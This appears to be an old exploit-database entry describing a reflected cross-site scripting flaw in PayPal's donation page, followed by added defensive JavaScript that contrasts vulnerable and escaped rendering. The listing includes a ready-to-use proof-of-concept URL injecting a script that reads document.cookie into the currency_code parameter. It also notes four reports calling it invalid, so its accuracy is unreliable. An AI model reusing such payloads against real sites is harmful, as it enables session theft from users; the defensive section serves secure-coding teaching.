Exploit Name: Paypal Suspended User XSS
Author: e_D
Versions Affected: All PayPal users
Exploit Details: A cross-site scripting exploit exists in the PayPal donation page where a user is suspended. If the email address of the account you are donating to has the following message on the donation page:
"This recipient is currently unable to receive money."
you can exploit this flaw by replacing the currency value in the donation form with "> followed by any HTML you wish to execute.
An Example:
https://www.paypal.com/xclick/business=unsakred_2k@yahoo.com&item_name=ed&item_number=1&amount=30.00&no_note=1&tax=0&currency_code=USD"><script>alert(document.cookie); </script>
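The flaw described above, seen from the server side, as an added example that is not code from the original listing or from PayPal. The hidden-field markup, the function names and the currency allowlist are assumptions; the sample query string is constructed from the currency value in the example URL.

```javascript
// Constructed sample: the currency value from the example URL above.
const SAMPLE_QUERY =
  'amount=30.00&currency_code=USD"><script>alert(document.cookie); </script>';

// Vulnerable pattern (hypothetical markup): the raw query value is pasted
// into a quoted attribute, so a `">` in the value closes the attribute and
// the tag, and whatever follows is parsed as page markup.
function renderCurrencyFieldUnsafe(currencyCode) {
  return '<input type="hidden" name="currency_code" value="' + currencyCode + '">';
}

// Escape the characters that are significant in HTML text and in quoted
// attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Assumed allowlist: a currency code is a closed set, so validate it
// before it reaches any template.
const ALLOWED_CURRENCIES = new Set(['USD', 'EUR', 'GBP', 'CAD', 'JPY', 'AUD']);

function normalizeCurrency(raw) {
  const code = String(raw == null ? '' : raw).trim().toUpperCase();
  return ALLOWED_CURRENCIES.has(code) ? code : null;
}

// Hardened pattern: reject unknown codes, and escape on output anyway so
// the error path (which echoes the input) cannot reflect markup either.
function renderCurrencyFieldSafe(rawCurrency) {
  const code = normalizeCurrency(rawCurrency);
  if (code === null) {
    return { status: 400, html: '<p>Unsupported currency: ' + escapeHtml(rawCurrency) + '</p>' };
  }
  return {
    status: 200,
    html: '<input type="hidden" name="currency_code" value="' + escapeHtml(code) + '">',
  };
}

// Run both renderers over the constructed sample query.
function demo() {
  const raw = new URLSearchParams(SAMPLE_QUERY).get('currency_code');
  return { unsafe: renderCurrencyFieldUnsafe(raw), safe: renderCurrencyFieldSafe(raw) };
}
```

Validation and output escaping are both applied because either one alone leaves a gap: the allowlist does not protect the error message, and escaping alone still accepts a nonsensical currency.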
This exploit has had 4 invalid reports. This is the number of times others have reported this exploit as not working or being false in certain details.